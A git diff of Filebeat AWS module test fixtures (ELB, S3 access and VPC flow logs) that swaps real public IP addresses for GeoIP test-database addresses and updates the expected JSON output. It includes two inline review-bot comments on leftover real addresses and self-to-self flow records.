diff --git a/x-pack/filebeat/module/aws/elb/test/elb-tcp.log-expected.json b/x-pack/filebeat/module/aws/elb/test/elb-tcp.log-expected.json index e960e2117638..9e6cca961379 100644 --- a/x-pack/filebeat/module/aws/elb/test/elb-tcp.log-expected.json +++ b/x-pack/filebeat/module/aws/elb/test/elb-tcp.log-expected.json @@ -19,18 +19,16 @@ "input.type": "log", "log.offset": 0, "service.type": "aws", - "source.as.number": 12430, - "source.as.organization.name": "Vodafone Spain", "source.bytes": 134, - "source.geo.city_name": "Teruel", + "source.geo.city_name": "London", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 40.3456, - "source.geo.location.lon": -1.1065, - "source.geo.region_iso_code": "ES-TE", - "source.geo.region_name": "Teruel", - "source.ip": "77.227.156.41", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.193", "source.port": "51600", "tags": [ "forwarded" 
@@ -54,20 +52,18 @@ "event.module": "aws", "fileset.name": "elb", "input.type": "log", - "log.offset": 142, + "log.offset": 140, "service.type": "aws", - "source.as.number": 12430, - "source.as.organization.name": "Vodafone Spain", "source.bytes": 134, - "source.geo.city_name": "Teruel", + "source.geo.city_name": "London", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 40.3456, - "source.geo.location.lon": -1.1065, - "source.geo.region_iso_code": "ES-TE", - "source.geo.region_name": "Teruel", - "source.ip": "77.227.156.41", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.193", "source.port": "51726", "tags": [ "forwarded" @@ -91,20 +87,18 @@ "event.module": "aws", "fileset.name": "elb", "input.type": "log", - "log.offset": 285, + "log.offset": 281, "service.type": "aws", - "source.as.number": 12430, - "source.as.organization.name": "Vodafone Spain", "source.bytes": 134, - "source.geo.city_name": "Teruel", + "source.geo.city_name": "London", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 40.3456, - "source.geo.location.lon": -1.1065, - "source.geo.region_iso_code": "ES-TE", - "source.geo.region_name": "Teruel", - "source.ip": "77.227.156.41", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.193", "source.port": "51734", "tags": [ "forwarded" 
@@ -128,20 +122,18 @@ "event.module": "aws", "fileset.name": "elb", "input.type": "log", - "log.offset": 427, + "log.offset": 421, "service.type": "aws", - "source.as.number": 12430, - "source.as.organization.name": "Vodafone Spain", "source.bytes": 134, - "source.geo.city_name": "Teruel", + "source.geo.city_name": "London", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 40.3456, - "source.geo.location.lon": -1.1065, - "source.geo.region_iso_code": "ES-TE", - "source.geo.region_name": "Teruel", - "source.ip": "77.227.156.41", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.193", "source.port": "51738", "tags": [ "forwarded" @@ -165,20 +157,18 @@ "event.module": "aws", "fileset.name": "elb", "input.type": "log", - "log.offset": 571, + "log.offset": 563, "service.type": "aws", - "source.as.number": 12430, - "source.as.organization.name": "Vodafone Spain", "source.bytes": 7, - "source.geo.city_name": "Teruel", + "source.geo.city_name": "London", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 40.3456, - "source.geo.location.lon": -1.1065, - "source.geo.region_iso_code": "ES-TE", - "source.geo.region_name": "Teruel", - "source.ip": "77.227.156.41", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.193", "source.port": "46288", "tags": [ "forwarded" 
@@ -202,20 +192,18 @@ "event.module": "aws", "fileset.name": "elb", "input.type": "log", - "log.offset": 712, + "log.offset": 702, "service.type": "aws", - "source.as.number": 12430, - "source.as.organization.name": "Vodafone Spain", "source.bytes": 17, - "source.geo.city_name": "Teruel", + "source.geo.city_name": "London", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 40.3456, - "source.geo.location.lon": -1.1065, - "source.geo.region_iso_code": "ES-TE", - "source.geo.region_name": "Teruel", - "source.ip": "77.227.156.41", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.193", "source.port": "46304", "tags": [ "forwarded" diff --git a/x-pack/filebeat/module/aws/elb/test/example-nlb-tcp.log b/x-pack/filebeat/module/aws/elb/test/example-nlb-tcp.log index 3ff8e07a578c..d7e937a9e6f5 100644 --- a/x-pack/filebeat/module/aws/elb/test/example-nlb-tcp.log +++ b/x-pack/filebeat/module/aws/elb/test/example-nlb-tcp.log @@ -1,2 +1,2 @@ -tls 1.0 2018-12-20T02:59:40 net/my-network-loadbalancer/c6e77e28c25b2234 g3d4b5e8bb8464cd 72.21.218.154:51341 172.100.100.185:443 5 2 98 246 - arn:aws:acm:us-east-2:671290407336:certificate/2a108f19-aded-46b0-8493-c63eb1ef4a99 - ECDHE-RSA-AES128-SHA tlsv12 - my-network-loadbalancer-c6e77e28c25b2234.elb.us-east-2.amazonaws.com +tls 1.0 2018-12-20T02:59:40 net/my-network-loadbalancer/c6e77e28c25b2234 g3d4b5e8bb8464cd 89.160.20.112:51341 172.100.100.185:443 5 2 98 246 - arn:aws:acm:us-east-2:671290407336:certificate/2a108f19-aded-46b0-8493-c63eb1ef4a99 - ECDHE-RSA-AES128-SHA tlsv12 - my-network-loadbalancer-c6e77e28c25b2234.elb.us-east-2.amazonaws.com 
diff --git a/x-pack/filebeat/module/aws/elb/test/example-nlb-tcp.log-expected.json b/x-pack/filebeat/module/aws/elb/test/example-nlb-tcp.log-expected.json index b5db726de69f..6a89bf9cb456 100644 --- a/x-pack/filebeat/module/aws/elb/test/example-nlb-tcp.log-expected.json +++ b/x-pack/filebeat/module/aws/elb/test/example-nlb-tcp.log-expected.json @@ -24,18 +24,18 @@ "input.type": "log", "log.offset": 0, "service.type": "aws", - "source.as.number": 16509, - "source.as.organization.name": "Amazon.com, Inc.", + "source.as.number": 29518, + "source.as.organization.name": "Bredband2 AB", "source.bytes": 98, - "source.geo.city_name": "Ashburn", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 39.0481, - "source.geo.location.lon": -77.4728, - "source.geo.region_iso_code": "US-VA", - "source.geo.region_name": "Virginia", - "source.ip": "72.21.218.154", + "source.geo.city_name": "Link\u00f6ping", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "SE", + "source.geo.country_name": "Sweden", + "source.geo.location.lat": 58.4167, + "source.geo.location.lon": 15.6167, + "source.geo.region_iso_code": "SE-E", + "source.geo.region_name": "\u00d6sterg\u00f6tland County", + "source.ip": "89.160.20.112", "source.port": "51341", "tags": [ "forwarded" diff --git a/x-pack/filebeat/module/aws/s3access/test/s3_server_access.log b/x-pack/filebeat/module/aws/s3access/test/s3_server_access.log index e56b8a34ed9c..cd46507df71d 100644 --- a/x-pack/filebeat/module/aws/s3access/test/s3_server_access.log +++ b/x-pack/filebeat/module/aws/s3access/test/s3_server_access.log 
@@ -2,6 +2,6 @@ 36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:42 +0000] 72.21.217.31 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 E26222010BCC32B6 REST.GET.LOCATION - "GET /test-s3-ks/?location&aws-account=627959692251 HTTP/1.1" 200 - 142 - 3 - "-" "AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation" - gNl/Q1IzY6nGTBygqI3rnMz/ZFOFwOTDpSMrNca+IcEmMAd6sCIs1ZRLYDekD8LB9lrj9UdQLWE= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2 36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:43 +0000] 72.21.217.31 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 4DD6D17D1C5C401C REST.GET.BUCKET - "GET /test-s3-ks/?max-keys=0&encoding-type=url&aws-account=627959692251 HTTP/1.1" 200 - 265 - 2 1 "-" "AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation" - KzvchfojYQnuFC4PABYVJVxIlv/f6r17LRaTSvw7x+bxj4PkkPKT1kX9x8wbqtq40iD4PC881iE= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2 36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:43 +0000] 72.21.217.31 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 706992E2F3CC3C3D REST.GET.LOCATION - "GET /test-s3-ks/?location&aws-account=627959692251 HTTP/1.1" 200 - 142 - 4 - "-" "AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 
vendor/Oracle_Corporation" - cIN12KTrJwx+uTBZD+opZUPE4iGypi8oG/oXGPzFk9CMuHQGuEpmAeNELdtYKDxf2TDor25Nikg= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2 -36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 jsoriano-s3-test [10/Sep/2019:15:11:07 +0000] 77.227.156.41 arn:aws:iam::123456:user/test@elastic.co 8CD7A4A71E2E5C9E BATCH.DELETE.OBJECT jolokia-war-1.5.0.war - 204 - - 344017 - - - - - IeDW5I3wefFxU8iHOcAzi5qr+O+1bdRlcQ0AO2WGjFh7JwYM6qCoKq+1TrUshrXMlBxPFtg97Vk= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.eu-central-1.amazonaws.com TLSv1.2 +36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 jsoriano-s3-test [10/Sep/2019:15:11:07 +0000] 81.2.69.193 arn:aws:iam::123456:user/test@elastic.co 8CD7A4A71E2E5C9E BATCH.DELETE.OBJECT jolokia-war-1.5.0.war - 204 - - 344017 - - - - - IeDW5I3wefFxU8iHOcAzi5qr+O+1bdRlcQ0AO2WGjFh7JwYM6qCoKq+1TrUshrXMlBxPFtg97Vk= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.eu-central-1.amazonaws.com TLSv1.2 36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [19/Sep/2019:17:06:39 +0000] 174.29.206.152 arn:aws:iam::123456:user/test@elastic.co 6CE38F1312D32BDD BATCH.DELETE.OBJECT Screen+Shot+2019-09-09+at+9.08.44+AM.png - 204 - - 57138 - - - - - LwRa4w6DbuU48GKQiH3jDbjfTyLCbwasFBsdttugRQ+9lH4jK8lT91+HhGZKMYI3sPyKuQ9LvU0= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2 67797214d75628047d9c76b18a78cded1a4b069b71f2a9d5a53649c38da8770b flow-log-test [14/Jul/2021:18:57:31 +0000] - svc:delivery.logs.amazonaws.com MVGXZXEVN3IG9S24 REST.PUT.OBJECT AWSLogs/000000000000/vpcflowlogs/us-gov-east-1/2021/07/13/000000000000_vpcflowlogs_us-gov-east-1_fl-_20210713T1855Z_f12aa632.log.gz "PUT /AWSLogs/000000000000/vpcflowlogs/us-gov-east-1/2021/07/13/000000000000_vpcflowlogs_us-gov-east-1_fl-0e7c13bf00cf15bfe_20210713T1855Z_f12aa632.log.gz HTTP/1.1" 200 - - 773 103 13 "-" "-" - 02SxwfXpO5UysN0GsKGa3uGDQ6E/W7+Hwo/luRH8p1VEexULoe66RCM+nja0dEq2JqLrtgjocvVRRkVt4= 
SigV4 ECDHE-RSA-AES128-GCM-SHA256 AuthHeader flow-log-test.s3.us-gov-west-1.amazonaws.com TLSv1.2 - diff --git a/x-pack/filebeat/module/aws/s3access/test/s3_server_access.log-expected.json b/x-pack/filebeat/module/aws/s3access/test/s3_server_access.log-expected.json index 80676a1b6cb0..f3999c8a14b1 100644 --- a/x-pack/filebeat/module/aws/s3access/test/s3_server_access.log-expected.json +++ b/x-pack/filebeat/module/aws/s3access/test/s3_server_access.log-expected.json @@ -36,14 +36,6 @@ "access" ], "fileset.name": "s3access", - "geo.city_name": "Ashburn", - "geo.continent_name": "North America", - "geo.country_iso_code": "US", - "geo.country_name": "United States", - "geo.location.lat": 39.0481, - "geo.location.lon": -77.4728, - "geo.region_iso_code": "US-VA", - "geo.region_name": "Virginia", "http.request.method": "GET", "http.response.body.bytes": 142, "http.response.status_code": 200, @@ -111,14 +103,6 @@ "access" ], "fileset.name": "s3access", - "geo.city_name": "Ashburn", - "geo.continent_name": "North America", - "geo.country_iso_code": "US", - "geo.country_name": "United States", - "geo.location.lat": 39.0481, - "geo.location.lon": -77.4728, - "geo.region_iso_code": "US-VA", - "geo.region_name": "Virginia", "http.request.method": "GET", "http.response.body.bytes": 142, "http.response.status_code": 200, @@ -187,14 +171,6 @@ "access" ], "fileset.name": "s3access", - "geo.city_name": "Ashburn", - "geo.continent_name": "North America", - "geo.country_iso_code": "US", - "geo.country_name": "United States", - "geo.location.lat": 39.0481, - "geo.location.lon": -77.4728, - "geo.region_iso_code": "US-VA", - "geo.region_name": "Virginia", "http.request.method": "GET", "http.response.body.bytes": 265, "http.response.status_code": 200, 
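Review bot: Only the 77.227.156.41 record in s3_server_access.log is rewritten to a test address; 72.21.217.31 and 174.29.206.152 on the unchanged lines of the same hunk are left as real public addresses, and the paired expected-JSON hunks (`@@ -36,14 +36,6 @@` onward, and `@@ -393,17 +361,9 @@`) simply drop their `geo.*` fields, presumably because the test GeoIP data has no entry for them. If the intent is to replace public addresses with test-database ones, those two records should be rewritten the same way (for example `174.29.206.152` → `89.160.20.112`, which the nlb fixture already uses) so geo enrichment for those events stays exercised instead of silently disappearing from the expected output. If leaving them is deliberate, the reason is worth stating in the commit description.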
@@ -262,14 +238,6 @@ "access" ], "fileset.name": "s3access", - "geo.city_name": "Ashburn", - "geo.continent_name": "North America", - "geo.country_iso_code": "US", - "geo.country_name": "United States", - "geo.location.lat": 39.0481, - "geo.location.lon": -77.4728, - "geo.region_iso_code": "US-VA", - "geo.region_name": "Virginia", "http.request.method": "GET", "http.response.body.bytes": 142, "http.response.status_code": 200, @@ -312,13 +280,13 @@ "aws.s3access.key": "jolokia-war-1.5.0.war", "aws.s3access.object_size": 344017, "aws.s3access.operation": "BATCH.DELETE.OBJECT", - "aws.s3access.remote_ip": "77.227.156.41", + "aws.s3access.remote_ip": "81.2.69.193", "aws.s3access.request_id": "8CD7A4A71E2E5C9E", "aws.s3access.requester": "arn:aws:iam::123456:user/test@elastic.co", "aws.s3access.signature_version": "SigV4", "aws.s3access.tls_version": "TLSv1.2", - "client.address": "77.227.156.41", - "client.ip": "77.227.156.41", + "client.address": "81.2.69.193", + "client.ip": "81.2.69.193", "client.user.id": "arn:aws:iam::123456:user/test@elastic.co", "cloud.provider": "aws", "cloud.region": "eu-central-1", 
@@ -328,25 +296,25 @@ "event.id": "8CD7A4A71E2E5C9E", "event.kind": "event", "event.module": "aws", - "event.original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 jsoriano-s3-test [10/Sep/2019:15:11:07 +0000] 77.227.156.41 arn:aws:iam::123456:user/test@elastic.co 8CD7A4A71E2E5C9E BATCH.DELETE.OBJECT jolokia-war-1.5.0.war - 204 - - 344017 - - - - - IeDW5I3wefFxU8iHOcAzi5qr+O+1bdRlcQ0AO2WGjFh7JwYM6qCoKq+1TrUshrXMlBxPFtg97Vk= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.eu-central-1.amazonaws.com TLSv1.2", + "event.original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 jsoriano-s3-test [10/Sep/2019:15:11:07 +0000] 81.2.69.193 arn:aws:iam::123456:user/test@elastic.co 8CD7A4A71E2E5C9E BATCH.DELETE.OBJECT jolokia-war-1.5.0.war - 204 - - 344017 - - - - - IeDW5I3wefFxU8iHOcAzi5qr+O+1bdRlcQ0AO2WGjFh7JwYM6qCoKq+1TrUshrXMlBxPFtg97Vk= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.eu-central-1.amazonaws.com TLSv1.2", "event.outcome": "success", "event.type": [ "access" ], "fileset.name": "s3access", - "geo.city_name": "Teruel", + "geo.city_name": "London", "geo.continent_name": "Europe", - "geo.country_iso_code": "ES", - "geo.country_name": "Spain", - "geo.location.lat": 40.3456, - "geo.location.lon": -1.1065, - "geo.region_iso_code": "ES-TE", - "geo.region_name": "Teruel", + "geo.country_iso_code": "GB", + "geo.country_name": "United Kingdom", + "geo.location.lat": 51.5142, + "geo.location.lon": -0.0931, + "geo.region_iso_code": "GB-ENG", + "geo.region_name": "England", "http.response.status_code": 204, "input.type": "log", "log.offset": 2875, "related.ip": [ - "77.227.156.41" + "81.2.69.193" ], "related.user": [ "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2" 
@@ -393,17 +361,9 @@
 "access"
 ],
 "fileset.name": "s3access",
- "geo.city_name": "Denver",
- "geo.continent_name": "North America",
- "geo.country_iso_code": "US",
- "geo.country_name": "United States",
- "geo.location.lat": 39.7044,
- "geo.location.lon": -105.0023,
- "geo.region_iso_code": "US-CO",
- "geo.region_name": "Colorado",
 "http.response.status_code": 204,
 "input.type": "log",
- "log.offset": 3280,
+ "log.offset": 3278,
 "related.ip": [
 "174.29.206.152"
 ],
@@ -457,7 +417,7 @@
 "http.response.status_code": 200,
 "http.version": "1.1",
 "input.type": "log",
- "log.offset": 3700,
+ "log.offset": 3698,
 "related.user": [
 "67797214d75628047d9c76b18a78cded1a4b069b71f2a9d5a53649c38da8770b"
 ],
diff --git a/x-pack/filebeat/module/aws/vpcflow/test/accept-reject-traffic.log b/x-pack/filebeat/module/aws/vpcflow/test/accept-reject-traffic.log
index 6355e43b4806..8e925989de6a 100644
--- a/x-pack/filebeat/module/aws/vpcflow/test/accept-reject-traffic.log
+++ b/x-pack/filebeat/module/aws/vpcflow/test/accept-reject-traffic.log
@@ -1,5 +1,5 @@
 version account-id interface-id srcaddr dstaddr srcport dstport protocol packets bytes start end action log-status
-2 123456789010 eni-1235b8ca123456789 78.24.182.42 158.109.0.1 20641 22 6 20 4249 1418530010 1418530070 ACCEPT OK
-2 123456789010 eni-1235b8ca123456789 78.24.182.42 158.109.0.1 49761 3389 6 20 4249 1418530010 1418530070 REJECT OK
+2 123456789010 eni-1235b8ca123456789 175.16.199.1 175.16.199.1 20641 22 6 20 4249 1418530010 1418530070 ACCEPT OK
+2 123456789010 eni-1235b8ca123456789 175.16.199.1 175.16.199.1 49761 3389 6 20 4249 1418530010 1418530070 REJECT OK
 2 123456789010 eni-1235b8ca123456789 203.0.113.12 172.31.16.139 0 0 1 4 336 1432917027 1432917142 ACCEPT OK
 2 123456789010 eni-1235b8ca123456789 172.31.16.139 203.0.113.12 0 0 1 4 336 1432917094 1432917142 REJECT OK
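Review bot: In the two rewritten records of accept-reject-traffic.log, srcaddr and dstaddr are now the same address (175.16.199.1 on both sides), so each flow is from a host to itself, and the matching expected output in accept-reject-traffic.log-expected.json lists `"175.16.199.1"` twice under `related.ip`. A flow between two distinct addresses would keep the source and destination enrichment (geo fields, `network.community_id`) exercised on different inputs, as the previous fixture did and as tcp-flag-sequence.log in this same change still does. If the self-to-self flow is deliberate, a sentence saying so in the PR description would stop the next fixture regeneration from "fixing" it.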
diff --git a/x-pack/filebeat/module/aws/vpcflow/test/accept-reject-traffic.log-expected.json b/x-pack/filebeat/module/aws/vpcflow/test/accept-reject-traffic.log-expected.json
index dbc6ebb3150a..3f2adbd186d6 100644
--- a/x-pack/filebeat/module/aws/vpcflow/test/accept-reject-traffic.log-expected.json
+++ b/x-pack/filebeat/module/aws/vpcflow/test/accept-reject-traffic.log-expected.json
@@ -8,22 +8,23 @@
 "aws.vpcflow.version": "2",
 "cloud.account.id": "123456789010",
 "cloud.provider": "aws",
- "destination.address": "158.109.0.1",
- "destination.as.number": 13041,
- "destination.as.organization.name": "Consorci de Serveis Universitaris de Catalunya",
- "destination.geo.continent_name": "Europe",
- "destination.geo.country_iso_code": "ES",
- "destination.geo.country_name": "Spain",
- "destination.geo.location.lat": 40.4172,
- "destination.geo.location.lon": -3.684,
- "destination.ip": "158.109.0.1",
+ "destination.address": "175.16.199.1",
+ "destination.geo.city_name": "Changchun",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "CN",
+ "destination.geo.country_name": "China",
+ "destination.geo.location.lat": 43.88,
+ "destination.geo.location.lon": 125.3228,
+ "destination.geo.region_iso_code": "CN-22",
+ "destination.geo.region_name": "Jilin Sheng",
+ "destination.ip": "175.16.199.1",
 "destination.port": 22,
 "event.category": "network_traffic",
 "event.dataset": "aws.vpcflow",
 "event.end": "2014-12-14T04:07:50.000Z",
 "event.kind": "event",
 "event.module": "aws",
- "event.original": "2 123456789010 eni-1235b8ca123456789 78.24.182.42 158.109.0.1 20641 22 6 20 4249 1418530010 1418530070 ACCEPT OK",
+ "event.original": "2 123456789010 eni-1235b8ca123456789 175.16.199.1 175.16.199.1 20641 22 6 20 4249 1418530010 1418530070 ACCEPT OK",
 "event.outcome": "allow",
 "event.start": "2014-12-14T04:06:50.000Z",
 "event.type": "flow",
@@ -31,29 +32,27 @@
 "input.type": "log",
 "log.offset": 115,
 "network.bytes": 4249,
- "network.community_id": "1:Ln/vlDqu658GHymxjnRAaUF8KS4=",
+ "network.community_id": "1:Tb5MsUIr7kDM5nsrp+bdl73tSAc=",
 "network.iana_number": "6",
 "network.packets": 20,
 "network.transport": "tcp",
 "network.type": "ipv4",
 "related.ip": [
- "158.109.0.1",
- "78.24.182.42"
+ "175.16.199.1",
+ "175.16.199.1"
 ],
 "service.type": "aws",
- "source.address": "78.24.182.42",
- "source.as.number": 35377,
- "source.as.organization.name": "Ao a.b.n.",
+ "source.address": "175.16.199.1",
 "source.bytes": 4249,
- "source.geo.city_name": "Moscow",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "RU",
- "source.geo.country_name": "Russia",
- "source.geo.location.lat": 55.7527,
- "source.geo.location.lon": 37.6172,
- "source.geo.region_iso_code": "RU-MOW",
- "source.geo.region_name": "Moscow",
- "source.ip": "78.24.182.42",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "source.packets": 20,
 "source.port": 20641,
 "tags": [
@@ -70,52 +69,51 @@
 "aws.vpcflow.version": "2",
 "cloud.account.id": "123456789010",
 "cloud.provider": "aws",
- "destination.address": "158.109.0.1",
- "destination.as.number": 13041,
- "destination.as.organization.name": "Consorci de Serveis Universitaris de Catalunya",
- "destination.geo.continent_name": "Europe",
- "destination.geo.country_iso_code": "ES",
- "destination.geo.country_name": "Spain",
- "destination.geo.location.lat": 40.4172,
- "destination.geo.location.lon": -3.684,
- "destination.ip": "158.109.0.1",
+ "destination.address": "175.16.199.1",
+ "destination.geo.city_name": "Changchun",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "CN",
+ "destination.geo.country_name": "China",
+ "destination.geo.location.lat": 43.88,
+ "destination.geo.location.lon": 125.3228,
+ "destination.geo.region_iso_code": "CN-22",
+ "destination.geo.region_name": "Jilin Sheng",
+ "destination.ip": "175.16.199.1",
 "destination.port": 3389,
 "event.category": "network_traffic",
 "event.dataset": "aws.vpcflow",
 "event.end": "2014-12-14T04:07:50.000Z",
 "event.kind": "event",
 "event.module": "aws",
- "event.original": "2 123456789010 eni-1235b8ca123456789 78.24.182.42 158.109.0.1 49761 3389 6 20 4249 1418530010 1418530070 REJECT OK",
+ "event.original": "2 123456789010 eni-1235b8ca123456789 175.16.199.1 175.16.199.1 49761 3389 6 20 4249 1418530010 1418530070 REJECT OK",
 "event.outcome": "deny",
 "event.start": "2014-12-14T04:06:50.000Z",
 "event.type": "flow",
 "fileset.name": "vpcflow",
 "input.type": "log",
- "log.offset": 228,
+ "log.offset": 229,
 "network.bytes": 4249,
- "network.community_id": "1:E3lDDGXG7D8azpdrN7WMLPJe30w=",
+ "network.community_id": "1:24uPcY6msuW1pExR5YFPCyWN5zI=",
 "network.iana_number": "6",
 "network.packets": 20,
 "network.transport": "tcp",
 "network.type": "ipv4",
 "related.ip": [
- "158.109.0.1",
- "78.24.182.42"
+ "175.16.199.1",
+ "175.16.199.1"
 ],
 "service.type": "aws",
- "source.address": "78.24.182.42",
- 
"source.as.number": 35377,
- "source.as.organization.name": "Ao a.b.n.",
+ "source.address": "175.16.199.1",
 "source.bytes": 4249,
- "source.geo.city_name": "Moscow",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "RU",
- "source.geo.country_name": "Russia",
- "source.geo.location.lat": 55.7527,
- "source.geo.location.lon": 37.6172,
- "source.geo.region_iso_code": "RU-MOW",
- "source.geo.region_name": "Moscow",
- "source.ip": "78.24.182.42",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "source.packets": 20,
 "source.port": 49761,
 "tags": [
@@ -146,7 +144,7 @@
 "event.type": "flow",
 "fileset.name": "vpcflow",
 "input.type": "log",
- "log.offset": 343,
+ "log.offset": 345,
 "network.bytes": 336,
 "network.community_id": "1:H//CCQJhRqDUJ9c23S0VrQ+drxU=",
 "network.iana_number": "1",
@@ -190,7 +188,7 @@
 "event.type": "flow",
 "fileset.name": "vpcflow",
 "input.type": "log",
- "log.offset": 451,
+ "log.offset": 453,
 "network.bytes": 336,
 "network.community_id": "1:cfQqw/Kh6+4yqhEKgkCw/m3WoJM=",
 "network.iana_number": "1",
diff --git a/x-pack/filebeat/module/aws/vpcflow/test/tcp-flag-sequence.log b/x-pack/filebeat/module/aws/vpcflow/test/tcp-flag-sequence.log
index 32c4f31a9b67..de0ff4010a7f 100644
--- a/x-pack/filebeat/module/aws/vpcflow/test/tcp-flag-sequence.log
+++ b/x-pack/filebeat/module/aws/vpcflow/test/tcp-flag-sequence.log
@@ -1,4 +1,4 @@
 version vpc-id subnet-id instance-id interface-id account-id type srcaddr dstaddr srcport dstport pkt-srcaddr pkt-dstaddr protocol bytes packets start end action tcp-flags log-status
-3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 IPv4 52.213.180.42 10.0.0.62 43416 5001 52.213.180.42 10.0.0.62 6 568 8 1566848875 1566848933 ACCEPT 2 OK
-3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 IPv4 52.213.180.42 10.0.0.62 43638 5001 52.213.180.42 10.0.0.62 6 1260 17 1566933133 1566933193 ACCEPT 3 OK
-3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 IPv4 10.0.0.62 52.213.180.42 5001 43638 10.0.0.62 52.213.180.42 6 967 14 1566933133 1566933193 ACCEPT 19 OK
